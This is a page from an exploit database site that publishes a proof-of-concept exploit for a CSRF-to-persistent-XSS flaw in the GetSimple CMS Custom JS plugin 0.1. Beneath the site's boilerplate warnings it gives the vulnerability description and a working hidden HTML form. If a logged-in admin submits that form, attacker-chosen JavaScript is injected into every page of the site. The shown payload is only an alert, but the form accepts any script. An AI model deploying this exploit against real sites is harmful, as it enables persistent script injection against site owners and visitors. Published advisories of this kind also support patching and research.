0day.today - 世界最大的漏洞利用数据库。
0day.today 用户须知:
本站管理员使用官方账号。请谨防诈骗!
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币 金币
本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS Vulnerability
# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS # Exploit Author: Abhishek Joshi # Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download # Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip # Version: 0.1 # Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 # Tested against: Firefox 78.7.0esr (64-bit) # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site. ## CSRF POST Form Method <html><body> <form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST"> <input type="hidden" name="customjs_url_content" value=""> <input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')"> <input type="hidden" name="submit" value="Save Settings"> <input type="submit" value="Submit request"> </form> </body></html> # 0day.today [2024-07-01] #